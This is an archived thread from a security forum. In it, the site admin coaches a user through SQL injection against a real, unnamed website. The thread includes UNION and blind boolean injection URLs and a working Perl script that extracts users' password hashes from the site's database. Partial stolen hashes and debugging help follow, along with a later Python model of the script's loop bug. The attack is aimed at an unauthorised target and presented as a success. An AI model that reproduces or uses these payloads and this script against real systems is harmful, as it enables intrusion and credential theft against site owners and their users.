IT Security and Insecurity Portal

Help with SQL injection.. (The used SELECT statements .... )

Posted: Sat Dec 13, 2008 6:17 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Hello and thanks if you can help me.
I found a site vuln, I think.
But when I numbered the columns with ORDER BY it's all OK:
just 3 columns.
Then I try
profilo.php?uid=-1 UNION SELECT null,null,null /*
or
profilo.php?uid=-1 UNION SELECT 1,2,3/*
or with -- or with ALL SELECT, and I have just the same answer:
The used SELECT statements have a different number of columns
If I use "from users" the answer is
Table '*****.users' doesn't exist
but "from utenti" is good:
The used SELECT statements have a different number of columns
I found little info on this problem.
Is it a problem of the structure of the query and the UNION SELECT statement?
Thanks to all!

Posted: Sat Dec 13, 2008 8:50 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

The best way is a step-by-step approach. The first step is getting the syntax right.
Use "uid" with a valid, working value, for example 523:
Code:
profilo.php?uid=523/*

No SQL syntax errors? Can you see the normal page?
Next, try blind injections:
Code:
profilo.php?uid=523+AND+1=1/*

You should see the normal page.
Code:
profilo.php?uid=523+AND+1=2/*

This must be a different page, probably partially empty.
Code:
profilo.php?uid=523+AND+LENGTH(@@version)>1/*

This must be the normal page again.
If your test results are as expected, then an exploitable SQL injection is
confirmed and the next step is to try injection with visual feedback.

Posted: Sat Dec 13, 2008 10:35 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Great waraxe..
I have done all your steps and I confirm your test:
it's positive.
We can try ....
Thanks, thanks, thanks..!!!
You are the number one..
I will understand blind SQL...
Then
after
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
normal page.
How do I proceed?
Thanks waraxe.... try injection together?

Posted: Sat Dec 13, 2008 10:51 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Next, try to find the valid column count:
Code:
profilo.php?uid=-1+UNION+SELECT+1/*

Code:
profilo.php?uid=-1+UNION+SELECT+1,2/*

Code:
profilo.php?uid=-1+UNION+SELECT+1,2,3/*

Keep incrementing the column count. It can be a large number, even >50!
And look for feedback. You can try test strings:
Code:
profilo.php?uid=-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*

Look for "test" in the response page HTML source!
And if you get an error message, do you see a reference to the affected code line? Pay attention to that line number. If it's different for various column numbers, then this means that the SQL injection occurs in multiple SQL queries and they need different column numbers ... actually it's a pretty common phenomenon in real-world SQL injection exploiting.
Anyway, your goal is to get working feedback! An SQL error does not always mean failure, because another SQL query can still succeed in the case of multiple queries! So ... look for feedback.

Posted: Sun Dec 14, 2008 10:33 am
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Quote:
Keep incrementing columns count. It can be large number, even >50!

And this is the problem.. from UNION SELECT 1 to UNION SELECT 1, ... 60 the answer is always...
The used SELECT statements have a different number of columns
-----
With this
-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*
the result is the same...
The used SELECT statements have a different number of columns... from 1-2-3 to >60...
it's always a blank page without HTML source and only that phrase.
The only difference in the page is with the previous technique..
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
-------
And obviously.. if I put
profilo.php?uid=-1 order by 1234/*
I obtain
Unknown column '1234' in 'order clause'
but with order by 3/* I obtain a regular page....
Then I think there are 3 columns.
Trying union select 1,2,3/*
I find the message:
The used SELECT statements have a different number of columns
WTF!!
I think it's only exploitable with a blind SQL, bruteforcing the ASCII value of something..
EXAMPLE
profilo.php?uid=1 union select pass,2,3 from utenti/*
Unknown column 'pass' in 'field list'
profilo.php?uid=1 union select password,2,3 from utenti/*
The used SELECT statements have a different number of columns (it's good !! ?? )
profilo.php?uid=1 union select username,2,3 from utenti/*
Unknown column 'username' in 'field list'
profilo.php?uid=1 union select nick,2,3 from utenti/*
The used SELECT statements have a different number of columns (it's good !!??!)
Therefore the columns are nick, password, and others I find in the login form like uid.
THANKS waraxe for your patience!!!
I hope you give me some genius idea....

Posted: Sun Dec 14, 2008 11:05 am
maku234
Regular user
Joined: Jun 03, 2007
Posts: 21
Location: estonia

Quote:
but with order by 3/* i obtain a regular page....
then i think there are 3 columns.
trying union select 1,2,3/*
find the message:
The used SELECT statements have a different number of columns

If you put order by 4/* do you also get a regular page?
And in that case increase the number until you get an error.

Posted: Sun Dec 14, 2008 11:19 am
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Quote:
If you but order by 4/* do you also get regular page ?
And in that case increase the number until you get error.

No, no.. I know.
If I put 4 I obtain unknown column 4 ... etc etc, like order by 1234/*
Then I think there are only 3 columns. But I always obtain this stupid phrase with the SELECT statement error.
I think it's a problem with the structure of the simple UNION query. It's not accepted.. I should try blind or make another type of query in the URL, but I don't know how at this moment. I will think.

Posted: Sun Dec 14, 2008 2:47 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Your best choice is probably blind injection. Write your own Perl/PHP/etc. script for this (it's my personal favorite approach) or use one of the many SQL injection tools available for download for free.
For example take one of my exploits:
http://www.waraxe.us/ftopict-3302.html
This is already a ~75% ready-to-use script for your goal, just some modifications are needed.

Posted: Sun Dec 14, 2008 4:12 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Fantastic, waraxe... I was already looking some time ago in your portal for a tool..
I'll look again and try to adapt and modify some code...
Very, very many thanks!!
If I win the "battle" I'll post the beautiful notice and the eventual solution....
See you !!!

Posted: Sun Dec 14, 2008 5:39 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

WOW EXPLOIT
I've made a simple blind in Perl with my friend athos.
This is the source:
Code:
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://********/profilo.php?uid=";
# ASCII codes for '0'..'9' and 'a'..'f': the password is assumed to be a hex (md5) string
my @chars = (48..57, 97..102);
# one outer iteration per character position, 32 positions for an md5 hash
for my $i(1..32) {
    foreach my $ord(@chars) {
        # true/false test: does character $i of the password have ASCII code $ord?
        $a = get($host."1+and+ascii(substring((select+password+from+utenti+where+uid=1),$i,1))=$ord--");
        # the site answers "non esiste" (Italian: "does not exist") when the condition is false
        if($a !~ /non esiste/i) {
            syswrite(STDOUT,chr($ord));
            $i++;    # moves to the next position but keeps scanning @chars for it (see the reply below)
        }
    }
}

I changed the array because I don't know if the password is md5 or not...
and the result is..
******@localhost:~/Desktop$ perl brute.pl
d1ddca4dd71dd6ee444*********
I think that I win loooool
Thanks to all and especially to waraxe..
See you later.... bye

Posted: Sun Dec 14, 2008 5:41 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Cool

Posted: Sun Dec 14, 2008 7:49 pm
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

It seems it's not finished... there's another problem..
WTF ?
This is the result---
+++++@localhost:~/Desktop$ perl blindsql.pl
d1ddca4dd71dd6ee444dd331664881bcbcc32ddd4cecee
How is it possible, 46 characters? Why does the exploit not stop itself at 32?
This is for uid=1.
For uid=2
this is the result: 54 characters
0ff74efeffb3eee0661363662ddacca047b47b7bb1ff74bb5cecee
Do I try with uid 3? loooooool
However the injection is good,
for example
profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=100--
(100 is ASCII for the letter "d") is OK, the page is loaded ... otherwise with
profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=101--
(101 is ASCII for the letter "e")
there is an error.
So I think it's a good technique.
But how is it possible that it extracts more than 32 chars? Probably the pass in the DB isn't md5? So must I try another array of chars? Another pass length in the exploit?
How can I modify this script?
THANKS another time to all and to waraxe.
EDIT
uid 3 8dd788149e49e9ee8dd88cc0267ae267ae67ae7aeaee4cc85cc2bb7ff65bbb 62 chars
???????
uid 4 ? growing 8 chars every uid ?

Posted: Sun Dec 14, 2008 11:53 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

This is why almost any script or program needs debugging and tweaking. In this specific case there seem to be logic errors in the execution flow. Like ...
Code:
if($a !~ /non esiste/i) {
syswrite(STDOUT,chr($ord));
$i++;

Maybe you need a "last" operator after "$i++"? At least from a performance point of view, because after the valid char for the current position is found, there is no need to look further at the same position. And use debug messages, so that you can see visual feedback from the script at every step.
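Why the script printed 46 characters for a 32-character hash, as an added example that is not part of the thread: a Python model of the posted Perl loops, run against a constructed 32-character hex string (not the hash from the thread) with a local string comparison standing in for the true/false page check. The secret's first characters are chosen so that the faulty loop starts its output the same way the posted run did ("d1ddca4dd7..."), and the same loop with the suggested `last` (a `break` here) returns exactly the secret.

```python
# Constructed 32-character hex string standing in for the md5 value the posted
# script recovers; it is NOT the hash from the thread. Its first characters are
# chosen so the faulty loop starts its output the same way the posted run did.
SECRET = "d1dca4d7" + "0123456789abcdef" + "fedcba98"

# Same order as the Perl @chars: ASCII codes for '0'..'9' then 'a'..'f'.
CHARS = list(range(48, 58)) + list(range(97, 103))

def oracle(secret, pos, code):
    """Local stand-in for the script's true/false page check: is character `pos`
    (1-based) of `secret` the one with ASCII code `code`? Positions past the end
    never match, just as substring() past the end of a string returns ''."""
    return pos <= len(secret) and secret[pos - 1] == chr(code)

def extract(secret, stop_after_match):
    """Mirror of the posted Perl loops. Perl's `for my $i (1..32)` gives $i a fresh
    value at the start of every outer iteration, so the script's `$i++` does not
    advance the outer loop; it only shifts which position the remaining inner
    iterations test. Without `last`, the inner loop goes on to match later
    positions whose characters come after the one just found, and the outer loop
    then tests those same positions again, so they are printed twice."""
    out = []
    for pos in range(1, len(secret) + 1):       # for my $i (1..32)
        i = pos
        for code in CHARS:                     # foreach my $ord (@chars)
            if oracle(secret, i, code):
                out.append(chr(code))          # syswrite(STDOUT, chr($ord))
                i += 1                         # $i++
                if stop_after_match:
                    break                      # the `last` suggested above

    return "".join(out)

def compare(secret=SECRET):
    """Returns (output without last, output with last) for the given secret."""
    return extract(secret, False), extract(secret, True)

if __name__ == "__main__":
    buggy, fixed = compare()
    print(f"without last: {len(buggy)} chars: {buggy}")
    print(f"with last:    {len(fixed)} chars: {fixed}")
```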

Posted: Mon Dec 15, 2008 12:19 am
ingh1pped
Advanced user
Joined: Dec 13, 2008
Posts: 88

Great waraxe....
You are the best!!! Incredible..
Like break in C language.
Exactly.. why didn't I think of that.. loool
Hash is OK..
I'll probably open a new topic in the right section for hashes that are not cracked.
www.waraxe.us Forum Index -> Sql injection
Powered by phpBB © 2001-2008 phpBB Group